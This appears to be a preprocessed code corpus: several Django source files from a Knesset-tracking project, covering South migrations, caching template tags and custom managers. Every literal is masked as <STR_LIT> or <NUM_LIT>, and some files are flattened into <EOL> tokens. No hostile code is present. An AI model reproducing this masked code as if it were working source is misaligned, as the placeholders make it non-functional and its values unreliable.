, <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:time>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : 
'<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
from django import template
from django.conf import settings
from django.core.cache import cache
from links.models import Link

register = template.Library()


@register.inclusion_tag('<STR_LIT>')
def object_links(obj):
    """Render the Link objects attached to *obj* (no caching)."""
    links = Link.objects.for_model(obj)
    return {'<STR_LIT>': links, '<STR_LIT>': settings.MEDIA_URL}


@register.inclusion_tag('<STR_LIT>')
def object_icon_links(obj):
    """Render icon links for *obj*, memoized in the Django cache.

    The cache key is derived from the object's app label, model name and
    primary key, so each object gets its own cached entry.
    """
    meta = obj._meta
    key = "<STR_LIT>" % (meta.app_label, meta.module_name, obj.pk)
    links = cache.get(key, None)
    if links is None:
        # Cache miss: hit the database once, then remember the result.
        links = Link.objects.for_model(obj)
        cache.set(key, links, settings.LONG_CACHE_TIME)
    return {'<STR_LIT>': links}
<s> import difflib <EOL> from django . core . cache import cache <EOL> from django . db import models , connection <EOL> class KnessetManager ( models . Manager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( KnessetManager , self ) . __init__ ( ) <EOL> self . _current_knesset = None <EOL> def current_knesset ( self ) : <EOL> if self . _current_knesset is None : <EOL> try : <EOL> self . _current_knesset = self . get_query_set ( ) . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> return None <EOL> return self . _current_knesset <EOL> class BetterManager ( models . Manager ) : <EOL> def __init__ ( self ) : <EOL> super ( BetterManager , self ) . __init__ ( ) <EOL> self . _names = [ ] <EOL> def find ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> names = cache . get ( '<STR_LIT>' % self . model . __name__ ) <EOL> if not names : <EOL> names = self . values_list ( '<STR_LIT:name>' , flat = True ) <EOL> cache . set ( '<STR_LIT>' % self . model . __name__ , names ) <EOL> possible_names = difflib . get_close_matches ( <EOL> name , names , cutoff = <NUM_LIT:0.5> , n = <NUM_LIT:5> ) <EOL> qs = self . filter ( name__in = possible_names ) <EOL> ret = range ( qs . count ( ) ) <EOL> for m in qs : <EOL> if m . name == name : <EOL> return [ m ] <EOL> ret [ possible_names . index ( m . name ) ] = m <EOL> return ret <EOL> class PartyManager ( BetterManager ) : <EOL> def parties_during_range ( self , ranges = None ) : <EOL> filters_folded = Agenda . generateSummaryFilters ( ranges , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return self . filter ( filters_folded ) <EOL> class CurrentKnessetPartyManager ( models . Manager ) : <EOL> def __init__ ( self ) : <EOL> super ( CurrentKnessetPartyManager , self ) . __init__ ( ) <EOL> self . _current = None <EOL> def get_query_set ( self ) : <EOL> from mks . models import Knesset <EOL> qs = super ( CurrentKnessetPartyManager , self ) . get_query_set ( ) <EOL> qs = qs . filter ( knesset = Knesset . objects . 
current_knesset ( ) ) <EOL> return qs <EOL> @ property <EOL> def current_parties ( self ) : <EOL> if self . _current is None : <EOL> self . _current = list ( self . get_query_set ( ) ) <EOL> return self . _current <EOL> class CurrentKnessetMembersManager ( models . Manager ) : <EOL> "<STR_LIT>" <EOL> def get_query_set ( self ) : <EOL> from mks . models import Knesset <EOL> qs = super ( CurrentKnessetMembersManager , self ) . get_query_set ( ) <EOL> qs = qs . filter ( current_party__knesset = Knesset . objects . current_knesset ( ) ) <EOL> return qs <EOL> class MembershipManager ( models . Manager ) : <EOL> def membership_in_range ( self , ranges = None ) : <EOL> if not ranges : <EOL> return <EOL> filter_list = [ ] <EOL> query_parameters = [ ] <EOL> for r in ranges : <EOL> if not r [ <NUM_LIT:0> ] and not r [ <NUM_LIT:1> ] : <EOL> return None <EOL> query_fields = [ ] <EOL> query_parameters = [ ] <EOL> if r [ <NUM_LIT:0> ] : <EOL> query_fields . append ( "<STR_LIT>" ) <EOL> query_parameters . append ( r [ <NUM_LIT:0> ] ) <EOL> if r [ <NUM_LIT:1> ] : <EOL> query_fields . append ( "<STR_LIT>" ) <EOL> query_parameters . append ( r [ <NUM_LIT:1> ] ) <EOL> filter_list . append ( '<STR_LIT>' . join ( query_fields ) ) <EOL> filters_folded = '<STR_LIT>' . join ( filter_list ) <EOL> query = "<STR_LIT>" % filters_folded <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( query , query_parameters ) <EOL> results = cursor . fetchall ( ) <EOL> return [ c [ <NUM_LIT:0> ] for c in results ] </s>
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models


class Migration(DataMigration):
    # South data migration: seeds (forwards) / removes (backwards) a single
    # Knesset row identified by its number.

    def forwards(self, orm):
        "<STR_LIT>"
        # Idempotent seed: creates the row only when it does not exist yet.
        orm.Knesset.objects.get_or_create(
            number=<NUM_LIT>,
            defaults={'<STR_LIT>': datetime.date(<NUM_LIT>, <NUM_LIT:2>, <NUM_LIT>),
                      '<STR_LIT>': datetime.date(<NUM_LIT>, <NUM_LIT:10>, <NUM_LIT:16>)})

    def backwards(self, orm):
        "<STR_LIT>"
        # Reverse of forwards(): delete the seeded row by the same number.
        orm.Knesset.objects.filter(number=<NUM_LIT>).delete()

    # Frozen ORM state auto-generated by South: each field is a
    # (field class path, positional args, keyword args) triple.
    # Do not edit by hand -- regenerate with ./manage.py schemamigration.
    models = {
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT:email>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:password>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:username>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>', '<STR_LIT>': "<STR_LIT>"},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:0>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
